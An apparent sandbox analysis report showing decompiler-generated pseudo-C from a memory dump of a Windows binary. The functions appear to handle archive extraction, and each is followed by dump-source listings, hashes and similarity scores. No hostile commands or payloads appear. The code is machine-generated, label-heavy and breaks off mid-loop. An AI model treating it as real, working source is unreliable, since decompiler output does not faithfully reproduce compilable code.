          																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
          																									_t608 = 0;
          																									_t432 =  *(_t706 + 0xb);
          																									 *((char*)(_t683 + 0x39)) = _t672;
          																									 *((char*)(_t683 + 0x3a)) = _t432;
          																									 *(_t706 - 0x1c) = 0;
          																									 *(_t706 - 0x28) = 0;
          																									__eflags = _t672;
          																									if(_t672 != 0) {
          																										L127:
          																										_t673 =  *(_t683 + 8);
          																										__eflags =  *((char*)(_t673 + 0x6198));
          																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
          																										__eflags =  *((char*)(_t706 - 0xf));
          																										if( *((char*)(_t706 - 0xf)) != 0) {
          																											L131:
          																											_t434 = 1;
          																											__eflags = 1;
          																											L132:
          																											__eflags =  *(_t706 - 0x24);
          																											 *((char*)(_t706 - 0xe)) = _t608;
          																											 *((char*)(_t706 - 0x12)) = _t434;
          																											 *((char*)(_t706 - 0xd)) = _t434;
          																											if( *(_t706 - 0x24) == 0) {
          																												__eflags =  *(_t574 + 0x3318);
          																												if( *(_t574 + 0x3318) == 0) {
          																													__eflags =  *((char*)(_t574 + 0x22a0));
          																													if(__eflags != 0) {
          																														E00202842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
          																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
          																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
          																														__eflags = 0;
          																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
          																														 *((char*)(_t472 + 0x4c60)) = 0;
          																														E002024D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
          																													} else {
          																														_push( *(_t574 + 0x32e4));
          																														_push( *(_t574 + 0x32e0));
          																														_push(_t698);
          																														E001F910B(_t574, _t673, _t683, __eflags);
          																													}
          																												}
          																												L163:
          																												E001F1E3B(_t574);
          																												__eflags =  *((char*)(_t574 + 0x3319));
          																												if( *((char*)(_t574 + 0x3319)) != 0) {
          																													L166:
          																													_t436 = 0;
          																													__eflags = 0;
          																													_t610 = 0;
          																													L167:
          																													__eflags =  *(_t574 + 0x3370);
          																													if( *(_t574 + 0x3370) != 0) {
          																														__eflags =  *((char*)(_t574 + 0x22a0));
          																														if( *((char*)(_t574 + 0x22a0)) == 0) {
          																															L175:
          																															__eflags =  *(_t706 + 0xb);
          																															 *((char*)(_t706 - 0xe)) = _t436;
          																															if( *(_t706 + 0xb) != 0) {
          																																L185:
          																																__eflags =  *(_t706 - 0x24);
          																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
          																																if( *(_t706 - 0x24) == 0) {
          																																	L189:
          																																	_t611 = 0;
          																																	__eflags = 0;
          																																	L190:
          																																	__eflags =  *((char*)(_t706 - 0xf));
          																																	if( *((char*)(_t706 - 0xf)) != 0) {
          																																		goto L212;
          																																	}
          																																	_t699 =  *(_t706 - 0x18);
          																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
          																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
          																																		L193:
          																																		__eflags =  *(_t706 - 0x24);
          																																		if( *(_t706 - 0x24) == 0) {
          																																			L197:
          																																			__eflags = _t436;
          																																			if(_t436 == 0) {
          																																				L200:
          																																				__eflags = _t611;
          																																				if(_t611 != 0) {
          																																					L208:
          																																					_t437 =  *(_t683 + 8);
          																																					__eflags =  *((char*)(_t437 + 0x61a0));
          																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
          																																						_t700 = _t683 + 0x10f6;
          																																						_t438 = E001FA12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
          																																						__eflags = _t438;
          																																						if(__eflags == 0) {
          																																							E001F6BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
          																																						}
          																																					}
          																																					 *(_t683 + 0x10f5) = 1;
          																																					goto L212;
          																																				}
          																																				_t675 =  *(_t706 - 0x28);
          																																				__eflags = _t675;
          																																				_t613 =  *(_t706 - 0x1c);
          																																				if(_t675 > 0) {
          																																					L203:
          																																					__eflags = _t436;
          																																					if(_t436 != 0) {
          																																						L206:
          																																						_t331 = _t706 - 0x2160; // -6496
          																																						E001F9BD6(_t331);
          																																						L207:
          																																						_t688 = _t574 + 0x32c0;
          																																						asm("sbb eax, eax");
          																																						asm("sbb ecx, ecx");
          																																						asm("sbb eax, eax");
          																																						_t339 = _t706 - 0x2160; // -6496
          																																						E001F9A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
          																																						_t340 = _t706 - 0x2160; // -6496
          																																						E001F94DA(_t340);
          																																						E001F7A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
          																																						asm("sbb eax, eax");
          																																						asm("sbb eax, eax");
          																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
          																																						E001F9A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
          																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
          																																						goto L208;
          																																					}
          																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
          																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
          																																						goto L206;
          																																					}
          																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
          																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
          																																						goto L207;
          																																					}
          																																					goto L206;
          																																				}
          																																				__eflags = _t613;
          																																				if(_t613 == 0) {
          																																					goto L207;
          																																				}
          																																				goto L203;
          																																			}
          																																			_t460 =  *(_t683 + 8);
          																																			__eflags =  *((char*)(_t460 + 0x6198));
          																																			if( *((char*)(_t460 + 0x6198)) == 0) {
          																																				goto L212;
          																																			}
          																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
          																																			goto L200;
          																																		}
          																																		__eflags = _t611;
          																																		if(_t611 != 0) {
          																																			goto L197;
          																																		}
          																																		__eflags =  *(_t574 + 0x3380) - 5;
          																																		if( *(_t574 + 0x3380) != 5) {
          																																			goto L212;
          																																		}
          																																		__eflags = _t674;
          																																		if(_t674 == 0) {
          																																			goto L212;
          																																		}
          																																		goto L197;
          																																	}
          																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
          																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
          																																		goto L212;
          																																	}
          																																	goto L193;
          																																}
          																																__eflags =  *(_t574 + 0x3380) - 4;
          																																if( *(_t574 + 0x3380) != 4) {
          																																	goto L189;
          																																}
          																																__eflags = _t674;
          																																if(_t674 == 0) {
          																																	goto L189;
          																																}
          																																_t611 = 1;
          																																goto L190;
          																															}
          																															__eflags =  *((char*)(_t706 - 0x12));
          																															if( *((char*)(_t706 - 0x12)) == 0) {
          																																goto L185;
          																															}
          																															__eflags = _t610;
          																															if(_t610 != 0) {
          																																goto L185;
          																															}
          																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
          																															if(__eflags == 0) {
          																																L183:
          																																_t311 = _t706 - 0x113c; // -2364
          																																_push(_t574 + 0x1e);
          																																_push(3);
          																																L184:
          																																E001F6BF5(__eflags);
          																																 *((char*)(_t706 - 0xe)) = 1;
          																																E001F6E03(0x2300e0, 3);
          																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
          																																goto L185;
          																															}
          																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
          																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
          																																L181:
          																																__eflags =  *((char*)(_t683 + 0xf3));
          																																if(__eflags != 0) {
          																																	goto L183;
          																																}
          																																_t309 = _t706 - 0x113c; // -2364
          																																_push(_t574 + 0x1e);
          																																_push(4);
          																																goto L184;
          																															}
          																															__eflags =  *(_t574 + 0x6cc4) - _t610;
          																															if(__eflags == 0) {
          																																goto L183;
          																															}
          																															goto L181;
          																														}
          																														__eflags =  *(_t574 + 0x32e4) - _t436;
          																														if(__eflags < 0) {
          																															goto L175;
          																														}
          																														if(__eflags > 0) {
          																															L173:
          																															__eflags = _t610;
          																															if(_t610 != 0) {
          																																 *((char*)(_t683 + 0xf3)) = 1;
          																															}
          																															goto L175;
          																														}
          																														__eflags =  *(_t574 + 0x32e0) - _t436;
          																														if( *(_t574 + 0x32e0) <= _t436) {
          																															goto L175;
          																														}
          																														goto L173;
          																													}
          																													 *((char*)(_t683 + 0xf3)) = _t436;
          																													goto L175;
          																												}
          																												asm("sbb edx, edx");
          																												_t469 = E001FA6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
          																												__eflags = _t469;
          																												if(_t469 == 0) {
          																													goto L166;
          																												}
          																												_t610 = 1;
          																												_t436 = 0;
          																												goto L167;
          																											}
          																											_t702 =  *(_t574 + 0x3380);
          																											__eflags = _t702 - 4;
          																											if(__eflags == 0) {
          																												L146:
          																												_t262 = _t706 - 0x41a8; // -14760
          																												E001F80B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
          																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
          																												__eflags = _t608;
          																												if(_t608 == 0) {
          																													L153:
          																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
          																													L154:
          																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
          																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
          																														L141:
          																														__eflags = _t608;
          																														if(_t608 == 0) {
          																															L157:
          																															_t480 = 0;
          																															__eflags = 0;
          																															L158:
          																															 *(_t683 + 0x10f5) = _t480;
          																															goto L163;
          																														}
          																														L142:
          																														__eflags = _t479;
          																														if(_t479 == 0) {
          																															goto L157;
          																														}
          																														_t480 = 1;
          																														goto L158;
          																													}
          																													__eflags = _t608;
          																													if(_t608 != 0) {
          																														goto L142;
          																													}
          																													L140:
          																													 *((char*)(_t706 - 0x12)) = 0;
          																													goto L141;
          																												}
          																												__eflags =  *((short*)(_t706 - 0x41a8));
          																												if( *((short*)(_t706 - 0x41a8)) == 0) {
          																													goto L153;
          																												}
          																												_t266 = _t706 - 0x41a8; // -14760
          																												_push(0x800);
          																												_push(_t683 + 0x10f6);
          																												__eflags = _t702 - 4;
          																												if(__eflags != 0) {
          																													_push(_t574 + 0x1e);
          																													_t269 = _t706 - 0x2160; // -6496
          																													_t479 = E001F9049(_t673, __eflags);
          																												} else {
          																													_t479 = E001F74DD(_t608, __eflags);
          																												}
          																												L151:
          																												 *((char*)(_t706 - 0xd)) = _t479;
          																												__eflags = _t479;
          																												if(_t479 == 0) {
          																													L139:
          																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
          																													goto L140;
          																												}
          																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
          																												goto L154;
          																											}
          																											__eflags = _t702 - 5;
          																											if(__eflags == 0) {
          																												goto L146;
          																											}
          																											__eflags = _t702 - _t434;
          																											if(_t702 == _t434) {
          																												L144:
          																												__eflags = _t608;
          																												if(_t608 == 0) {
          																													goto L153;
          																												}
          																												_push(_t683 + 0x10f6);
          																												_t479 = E001F774C(_t673, _t683 + 0x10, _t574);
          																												goto L151;
          																											}
          																											__eflags = _t702 - 2;
          																											if(_t702 == 2) {
          																												goto L144;
          																											}
          																											__eflags = _t702 - 3;
          																											if(__eflags == 0) {
          																												goto L144;
          																											}
          																											E001F6BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
          																											__eflags = 0;
          																											_t479 = 0;
          																											 *((char*)(_t706 - 0xd)) = 0;
          																											goto L139;
          																										}
          																										__eflags = _t432;
          																										if(_t432 != 0) {
          																											goto L131;
          																										}
          																										_t491 = 0x50;
          																										__eflags =  *(_t706 - 0x18) - _t491;
          																										if( *(_t706 - 0x18) == _t491) {
          																											goto L131;
          																										}
          																										_t434 = 1;
          																										_t608 = 1;
          																										goto L132;
          																									}
          																									__eflags =  *(_t574 + 0x6cc4);
          																									if( *(_t574 + 0x6cc4) != 0) {
          																										goto L127;
          																									}
          																									_t703 =  *(_t574 + 0x32e4);
          																									_t681 =  *(_t574 + 0x32e0);
          																									__eflags = _t703;
          																									if(__eflags < 0) {
          																										L126:
          																										_t698 = _t683 + 0x10;
          																										goto L127;
          																									}
          																									if(__eflags > 0) {
          																										L115:
          																										_t631 =  *(_t574 + 0x32d8);
          																										_t632 = _t631 << 0xa;
          																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
          																										if(__eflags < 0) {
          																											L125:
          																											_t432 =  *(_t706 + 0xb);
          																											_t608 = 0;
          																											__eflags = 0;
          																											goto L126;
          																										}
          																										if(__eflags > 0) {
          																											L118:
          																											__eflags = _t703;
          																											if(__eflags < 0) {
          																												L124:
          																												_t237 = _t706 - 0x2160; // -6496
          																												E001F98D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
          																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
          																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
          																												goto L125;
          																											}
          																											if(__eflags > 0) {
          																												L121:
          																												_t499 = E001F96E1(_t681);
          																												__eflags = _t681 -  *(_t574 + 0x32dc);
          																												if(__eflags < 0) {
          																													goto L125;
          																												}
          																												if(__eflags > 0) {
          																													goto L124;
          																												}
          																												__eflags = _t499 -  *(_t574 + 0x32d8);
          																												if(_t499 <=  *(_t574 + 0x32d8)) {
          																													goto L125;
          																												}
          																												goto L124;
          																											}
          																											__eflags = _t681 - 0x5f5e100;
          																											if(_t681 < 0x5f5e100) {
          																												goto L124;
          																											}
          																											goto L121;
          																										}
          																										__eflags = _t632 - _t681;
          																										if(_t632 <= _t681) {
          																											goto L125;
          																										}
          																										goto L118;
          																									}
          																									__eflags = _t681 - 0xf4240;
          																									if(_t681 <= 0xf4240) {
          																										goto L126;
          																									}
          																									goto L115;
          																								}
          																								L109:
          																								_t198 = _t683 + 0xe4;
          																								 *_t198 =  *(_t683 + 0xe4) + 1;
          																								__eflags =  *_t198;
          																								goto L110;
          																							}
          																							 *((char*)(_t706 - 0xf)) = 0;
          																							_t501 = 0x50;
          																							__eflags = _t696 - _t501;
          																							if(_t696 != _t501) {
          																								_t192 = _t706 - 0x2160; // -6496
          																								__eflags = E001F9745(_t192);
          																								if(__eflags != 0) {
          																									E001F6BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
          																									E001F6E9B(0x2300e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
          																								}
          																							}
          																							goto L109;
          																						}
          																						 *(_t683 + 0x10f5) = 1;
          																						__eflags =  *((char*)(_t422 + 0x61f9));
          																						if( *((char*)(_t422 + 0x61f9)) != 0) {
          																							_t423 =  *(_t706 + 0xb);
          																							goto L108;
          																						}
          																						goto L103;
          																					}
          																					 *(_t706 + 0xb) = 1;
          																					 *(_t706 + 0xf) = 1;
          																					_t182 = _t706 - 0x113c; // -2364
          																					_t511 = E00200FD9(_t601, _t182, 0, 0, 1);
          																					__eflags = _t511;
          																					if(_t511 != 0) {
          																						goto L101;
          																					}
          																					__eflags = 0;
          																					 *(_t706 - 0x1c) = 0;
          																					L99:
          																					_t184 = _t706 - 0x2160; // -6496
          																					E001F946E(_t184);
          																					_t393 =  *(_t706 - 0x1c);
          																					goto L16;
          																				}
          																				_t174 = _t706 - 0x2160; // -6496
          																				_push(_t574);
          																				_t515 = E001F7F5F(_t683);
          																				_t696 =  *(_t706 - 0x18);
          																				_t601 = _t515;
          																				 *(_t706 + 0xf) = _t601;
          																				L93:
          																				__eflags = _t601;
          																				if(_t601 != 0) {
          																					goto L101;
          																				}
          																				goto L96;
          																			}
          																			__eflags =  *(_t706 + 0xf);
          																			if( *(_t706 + 0xf) != 0) {
          																				_t516 =  *(_t706 - 0x18);
          																				__eflags = _t516 - 0x50;
          																				if(_t516 != 0x50) {
          																					_t639 = 0x49;
          																					__eflags = _t516 - _t639;
          																					if(_t516 != _t639) {
          																						_t640 = 0x45;
          																						__eflags = _t516 - _t640;
          																						if(_t516 != _t640) {
          																							_t517 =  *(_t683 + 8);
          																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
          																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
          																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
          																								_t172 = _t706 - 0x113c; // -2364
          																								_push(_t574);
          																								E001F7D9B(_t683);
          																							}
          																						}
          																					}
          																				}
          																			}
          																			goto L99;
          																		}
          																		__eflags = _t418 - 5;
          																		if(_t418 == 5) {
          																			goto L83;
          																		}
          																		_t601 =  *(_t706 + 0xf);
          																		_t696 =  *(_t706 - 0x18);
          																		__eflags = _t601;
          																		if(_t601 == 0) {
          																			goto L96;
          																		}
          																		__eflags = _t696 - _t670;
          																		if(_t696 == _t670) {
          																			goto L93;
          																		}
          																		_t520 =  *(_t683 + 8);
          																		__eflags =  *((char*)(_t520 + 0x61f9));
          																		if( *((char*)(_t520 + 0x61f9)) != 0) {
          																			goto L93;
          																		}
          																		 *((char*)(_t706 - 0xf)) = 0;
          																		_t523 = E001F9E6B(_t683 + 0x10f6);
          																		__eflags = _t523;
          																		if(_t523 == 0) {
          																			L81:
          																			__eflags =  *((char*)(_t706 - 0xf));
          																			if( *((char*)(_t706 - 0xf)) == 0) {
          																				_t601 =  *(_t706 + 0xf);
          																				goto L93;
          																			}
          																			L82:
          																			_t601 = 0;
          																			 *(_t706 + 0xf) = 0;
          																			goto L93;
          																		}
          																		__eflags =  *((char*)(_t706 - 0xf));
          																		if( *((char*)(_t706 - 0xf)) != 0) {
          																			goto L82;
          																		}
          																		__eflags = 0;
          																		_push(0);
          																		_push(_t574 + 0x32c0);
          																		_t160 = _t706 - 0xf; // 0x7f1
          																		E001F919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
          																		goto L81;
          																	}
          																	__eflags =  *((char*)(_t574 + 0x3341));
          																	if( *((char*)(_t574 + 0x3341)) == 0) {
          																		goto L73;
          																	}
          																	_t132 = _t706 - 0x2c; // 0x7d4
          																	_t531 = E0020F3CA(_t574 + 0x3342, _t132, 8);
          																	_t708 = _t710 + 0xc;
          																	__eflags = _t531;
          																	if(_t531 == 0) {
          																		goto L73;
          																	}
          																	__eflags =  *(_t574 + 0x6cc4);
          																	if( *(_t574 + 0x6cc4) != 0) {
          																		goto L73;
          																	}
          																	__eflags =  *((char*)(_t683 + 0x10f4));
          																	_t136 = _t706 - 0x113c; // -2364
          																	_push(_t574 + 0x1e);
          																	if(__eflags != 0) {
          																		_push(6);
          																		E001F6BF5(__eflags);
          																		E001F6E03(0x2300e0, 0xb);
          																		__eflags = 0;
          																		 *(_t706 + 0xf) = 0;
          																		goto L73;
          																	}
          																	_push(0x7d);
          																	E001F6BF5(__eflags);
          																	E001FE797( *(_t683 + 8) + 0x5024);
          																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
          																	_t141 = _t706 - 0x13c; // 0x6c4
          																	L001FE724(_t141);
          																}
          															}
          															E001F6E03(0x2300e0, 2);
          															_t543 = E001F1E3B(_t574);
          															__eflags =  *((char*)(_t574 + 0x6cb4));
          															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
          															goto L16;
          														}
          														_t100 = _t706 - 0x2198; // -6552
          														_t545 = E001F7BBB(_t100, _t574 + 0x32c0);
          														__eflags = _t545;
          														if(_t545 == 0) {
          															goto L61;
          														}
          														__eflags =  *((char*)(_t706 - 0x219c));
          														if( *((char*)(_t706 - 0x219c)) == 0) {
          															L59:
          															 *(_t706 + 0xf) = 0;
          															goto L61;
          														}
          														_t102 = _t706 - 0x2198; // -6552
          														_t547 = E001F7B9D(_t102, _t683);
          														__eflags = _t547;
          														if(_t547 == 0) {
          															goto L61;
          														}
          														goto L59;
          													}
          													__eflags = _t692 - _t668;
          													if(_t692 != _t668) {
          														goto L61;
          													}
          													goto L55;
          												}
          												__eflags =  *((char*)(_t398 + 0x6154));
          												if( *((char*)(_t398 + 0x6154)) == 0) {
          													goto L61;
          												}
          												goto L53;
          											}
          											__eflags =  *(_t683 + 0x10f6);
          											if( *(_t683 + 0x10f6) == 0) {
          												goto L50;
          											}
          											 *(_t706 + 0xf) = 1;
          											__eflags =  *(_t574 + 0x3318);
          											if( *(_t574 + 0x3318) == 0) {
          												goto L51;
          											}
          											goto L50;
          										}
          										__eflags = _t692 - _t387;
          										_t388 = 1;
          										if(_t692 != _t387) {
          											goto L46;
          										}
          										goto L45;
          									}
          									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
          									 *(_t706 + 0xb) = _t671;
          									 *(_t706 + 0xc) = _t671;
          									__eflags = _t671;
          									if(_t671 == 0) {
          										goto L214;
          									} else {
          										_t667 = 0;
          										__eflags = 0;
          										goto L43;
          									}
          								}
          								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
          								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
          									goto L29;
          								}
          								__eflags =  *((char*)(_t683 + 0xf1));
          								if( *((char*)(_t683 + 0xf1)) != 0) {
          									goto L219;
          								}
          								goto L29;
          							}
          							if(__eflags < 0) {
          								L25:
          								 *(_t574 + 0x32e0) = _t665;
          								 *(_t574 + 0x32e4) = _t665;
          								goto L26;
          							}
          							__eflags =  *(_t574 + 0x32e0) - _t665;
          							if( *(_t574 + 0x32e0) >= _t665) {
          								goto L26;
          							}
          							goto L25;
          						}
          						if(__eflags < 0) {
          							L21:
          							 *(_t574 + 0x32d8) = _t665;
          							 *(_t574 + 0x32dc) = _t665;
          							goto L22;
          						}
          						__eflags =  *(_t574 + 0x32d8) - _t665;
          						if( *(_t574 + 0x32d8) >= _t665) {
          							goto L22;
          						}
          						goto L21;
          					}
          					__eflags = _t690 - 3;
          					if(_t690 != 3) {
          						L10:
          						__eflags = _t690 - 5;
          						if(_t690 != 5) {
          							goto L217;
          						}
          						__eflags =  *((char*)(_t574 + 0x45ac));
          						if( *((char*)(_t574 + 0x45ac)) == 0) {
          							goto L219;
          						}
          						_push( *(_t706 - 0x18));
          						_push(0);
          						_push(_t683 + 0x10);
          						_push(_t574);
          						_t564 = E002080D0(_t665);
          						__eflags = _t564;
          						if(_t564 != 0) {
          							__eflags = 0;
          							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
          							goto L15;
          						} else {
          							E001F6E03(0x2300e0, 1);
          							goto L219;
          						}
          					}
          					__eflags =  *(_t683 + 0x10f5);
          					if( *(_t683 + 0x10f5) == 0) {
          						goto L217;
          					} else {
          						E001F79A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
          						goto L10;
          					}
          				}
          				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
          					L4:
          					_t393 = 0;
          					goto L17;
          				}
          				_push(_t370);
          				_push(0);
          				_push(_t683 + 0x10);
          				_push(_t574);
          				if(E002080D0(0) != 0) {
          					_t665 = 0;
          					__eflags = 0;
          					goto L6;
          				} else {
          					E001F6E03(0x2300e0, 1);
          					goto L4;
          				}
          			}


          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog_memcmp
          • String ID:
          • API String ID: 3004599000-0
          • Opcode ID: 64463a1885801266d07ed4c6efabef87ad16a8abc224671d97c0ecfda93614bb
          • Instruction ID: f197d60e9a11a7e6e600aa5cf1c3ed831768f587f7f7bb602e5bf7796f54102b
          • Opcode Fuzzy Hash: 64463a1885801266d07ed4c6efabef87ad16a8abc224671d97c0ecfda93614bb
          • Instruction Fuzzy Hash: A4820A7190428DAEDF15DF64C885BFABBA9BF15300F0841BAEE499B143DF315A85CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0020E643() {
          				_Unknown_base(*)()* _t1;
          
          				_t1 = SetUnhandledExceptionFilter(E0020E64F); // executed
          				return _t1;
          			}




          0x0020e648
          0x0020e64e

          APIs
          • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,0020E084), ref: 0020E648
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: bfdad2e2da54a38a912f59c16158c691f90d6527444dc3cf3f00a5066146b99f
          • Instruction ID: a58043cb4b56084e6f0cd7d46243bcabdfd30401038d25a151e6701796224130
          • Opcode Fuzzy Hash: bfdad2e2da54a38a912f59c16158c691f90d6527444dc3cf3f00a5066146b99f
          • Instruction Fuzzy Hash:
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 98%
          			E0020626D(signed int __ecx, void* __edx, void* __eflags) {
          				void* __ebp;
          				signed int _t161;
          				intOrPtr _t164;
          				signed int _t170;
          				signed int _t171;
          				signed int _t175;
          				signed int _t178;
          				void* _t181;
          				void* _t188;
          				signed int _t193;
          				signed int _t194;
          				signed int _t195;
          				signed int _t197;
          				signed int _t208;
          				signed int _t212;
          				intOrPtr _t213;
          				signed int _t216;
          				signed int _t219;
          				signed int _t223;
          				signed int _t225;
          				signed int _t226;
          				intOrPtr* _t232;
          				void* _t238;
          				signed int _t240;
          				signed int _t241;
          				intOrPtr _t245;
          				intOrPtr _t247;
          				signed int _t257;
          				intOrPtr* _t259;
          				signed int _t260;
          				signed int _t263;
          				intOrPtr* _t267;
          				intOrPtr _t268;
          				void* _t269;
          				signed int _t270;
          				void* _t272;
          				signed int _t273;
          				void* _t274;
          				void* _t276;
          
          				_t216 = __ecx; // executed
          				E00202A7F(__ecx, __edx); // executed
          				E002042D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
          				_t240 = 0;
          				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
          					_t238 = 0;
          					do {
          						_t213 =  *((intOrPtr*)(_t216 + 0x18));
          						_t238 = _t238 + 0x4ae4;
          						_t240 = _t240 + 1;
          						 *((char*)(_t213 + _t238 - 0x13)) = 0;
          						 *((char*)(_t213 + _t238 - 0x11)) = 0;
          					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
          				}
          				_t219 = 5;
          				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
          				E0020EA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
          				_t276 = _t274 + 0x18;
          				_t263 = 0;
          				 *(_t276 + 0x28) = 0;
          				_t268 = 0;
          				 *((char*)(_t276 + 0x13)) = 0;
          				 *((intOrPtr*)(_t276 + 0x18)) = 0;
          				 *((char*)(_t276 + 0x12)) = 0;
          				while(1) {
          					L4:
          					_push(0x00400000 - _t263 & 0xfffffff0);
          					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
          					_t161 = E001FC70F();
          					 *(_t276 + 0x2c) = _t161;
          					if(_t161 < 0) {
          						break;
          					}
          					_t263 = _t263 + _t161;
          					 *(_t276 + 0x20) = _t263;
          					if(_t263 != 0) {
          						if(_t161 <= 0) {
          							goto L56;
          						} else {
          							if(_t263 >= 0x400) {
          								L56:
          								while(_t268 < _t263) {
          									_t225 = 0;
          									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
          									 *(_t276 + 0x1c) = 0;
          									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
          									__eflags = _t170;
          									if(_t170 != 0) {
          										_t245 =  *((intOrPtr*)(_t276 + 0x18));
          										_t273 = 0;
          										__eflags = 0;
          										do {
          											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
          											 *(_t276 + 0x28) = _t225;
          											__eflags =  *((char*)(_t259 + 0x4ad3));
          											 *_t259 = _t216;
